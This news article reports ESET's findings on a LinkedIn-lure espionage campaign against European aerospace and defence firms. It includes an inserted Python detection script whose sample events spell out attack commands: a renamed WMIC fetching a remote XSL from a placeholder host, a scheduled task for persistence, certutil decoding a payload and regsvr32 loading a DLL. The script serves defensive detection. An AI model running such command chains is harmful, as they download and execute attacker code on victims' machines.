European aerospace and military blue chips have been targeted by a sophisticated espionage campaign that involved the use of previously unseen malware, as well as social engineering, security firm ESET has revealed — after an investigation conducted alongside two of the affected firms.
The attackers took their first step towards infiltrating the networks by luring employees in with the promise of a job at a rival business, then slipping malware into documents purportedly containing further information about the roles. The attackers set up LinkedIn profiles masquerading as recruiters at major contractors Collins Aerospace and General Dynamics.
In a report released this week by Slovakia-headquartered ESET, the company said the attacks were launched between September and December 2019.
(To a casual observer, and perhaps especially to a native English speaker, the LinkedIn overtures look deeply unconvincing and notably suspicious: “As you are a reliable elite, I will recommend you to our very important department”, reads one message. Viewing them is a reminder that social engineering attacks do not need to be polished to still be hugely effective as a threat vector).
The initial shared file did contain salary details, but it was a decoy.
“The shared file was a password-protected RAR archive containing a LNK file,” said ESET. “When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser.”
“In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe.”
ESET has published IOCs on its GitHub repo here.
Once in, the malware was significantly more sophisticated than the social engineering attempts: “The attackers used WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware,” ESET said.
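The chain described above leans on renamed and misused built-in Windows tools rather than on anything a signature would catch, so the useful detection signal is the combination of the PE's OriginalFileName, the image path and the command line. The following added example (not from the ESET report or its IOCs) runs a handful of such rules over constructed Sysmon-style process-creation records that mirror the described chain; the folder, task name and URL are made up.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records (not from the ESET report);
# paths, task name and URL are made up to mirror the chain described above.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "original_file_name": "Cmd.Exe",
     "command_line": r"cmd.exe /c start https://example.invalid/offer.pdf & mkdir C:\Users\Public\Libs & copy C:\Windows\System32\wbem\WMIC.exe C:\Users\Public\Libs\svchost.exe"},
    {"image": r"C:\Windows\System32\schtasks.exe", "original_file_name": "schtasks.exe",
     "command_line": r'schtasks /create /tn Libs /sc minute /mo 30 /tr "C:\Users\Public\Libs\svchost.exe os get /format:https://example.invalid/s.xsl"'},
    {"image": r"C:\Users\Public\Libs\svchost.exe", "original_file_name": "wmic.exe",
     "command_line": r'C:\Users\Public\Libs\svchost.exe os get /format:"https://example.invalid/s.xsl"'},
    {"image": r"C:\Windows\System32\certutil.exe", "original_file_name": "CertUtil.exe",
     "command_line": r"certutil -decode C:\Users\Public\Libs\s.txt C:\Users\Public\Libs\s.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "original_file_name": "REGSVR32.EXE",
     "command_line": r"regsvr32 /s C:\Users\Public\Libs\s.dll"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "original_file_name": "wmic.exe",
     "command_line": "wmic os get caption"},  # benign local WMIC query, must not fire
]

def classify(ev):
    """Return the list of rule names an event matches (empty if nothing fired)."""
    image = PureWindowsPath(ev["image"]).name.lower()
    orig = ev.get("original_file_name", "").lower()  # from PE version info; survives renaming
    cmd = ev["command_line"]
    hits = []
    if re.search(r"\bcopy\b.*\bwmic\.exe\b", cmd, re.I):
        hits.append("wmic_copied")                      # staging a copy of WMIC elsewhere
    if orig == "wmic.exe" and image != "wmic.exe":
        hits.append("renamed_wmic")                     # on-disk name no longer matches
    if orig == "wmic.exe" and re.search(r'/format:\s*"?https?://', cmd, re.I):
        hits.append("wmic_remote_xsl")                  # XSL stylesheet fetched over HTTP(S)
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        m = re.search(r'/tr\s+"?([^"]*?\.exe)', cmd, re.I)
        if m and not m.group(1).lower().startswith("c:\\windows\\"):
            hits.append("task_runs_nonsystem_binary")   # persistence via a user-writable path
    if image == "certutil.exe" and re.search(r"-(decode|urlcache)\b", cmd, re.I):
        hits.append("certutil_decode")                  # certutil as a base64 decoder/downloader
    if image in ("rundll32.exe", "regsvr32.exe") and re.search(
            r"\\(users|programdata|temp)\\", cmd, re.I):
        hits.append("script_host_loads_user_writable_dll")
    return hits

def triage(events):
    """Map each command line that fired at least one rule to the rules it triggered."""
    return {ev["command_line"]: hits for ev in events if (hits := classify(ev))}

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits):40} {cmd}")
```

Matching on OriginalFileName is what lets the third record fire even though the binary was renamed; the stock `wmic os get caption` record shows the rules stay quiet on a local query.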
Once in the system, the attackers were able to do two things. One was to look around for sensitive information, which they exfiltrated using a custom build of open-source code that uploaded files to a Dropbox account.
The other was to harvest internal data to carry out further Business Email Compromise scams on staff across the company. Worryingly, the attackers also digitally signed some components of their malware, including a custom downloader and backdoor, and the dbxcli tool.
“The certificate was issued in October 2019 – while the attacks were active – to 16:20 Software, LLC.,” ESET noted.
Later in the campaign, the attackers also sought to monetise their access by finding unpaid invoices and attempting to exploit them.
“They followed up the conversation and urged the customer to pay the invoice, however, to a different bank account than previously agreed (see Figure 8), to which the customer responded with some inquiries.
“As part of this ruse, the attackers registered an identical domain name to that of the compromised company, but on a different top-level domain, and used an email associated with this fake domain for further communication with the targeted customer”.
This is where they were thwarted, however, as an alert customer checked in on a legitimate email address at the aerospace company to enquire about the shady request and the scam was flagged.
Ultimately, neither malware analysis nor the broader investigation allowed post-incident response to “gain insight into what files the Operation In(ter)ception attackers were after”, ESET says: “However, the job titles of the employees targeted via LinkedIn suggest that the attackers were interested in technical and business-related information.”
It tentatively attributed the attack to the North Korean APT Lazarus, saying “we have seen a variant of the Stage 1 malware that carried a sample of Win32/NukeSped.FX, which belongs to a malicious toolset that ESET attributes to the Lazarus group”, but admitted it lacks compelling evidence.
Attackers going after high-value targets like this can be persistent, creative, and willing to use unusual techniques. Earlier this year a leading UK cybersecurity law enforcement officer warned CISOs that he was seeing a “much larger increase in physical breaches”, with cybercrime groups planting moles in cleaning agencies to gain hardware access.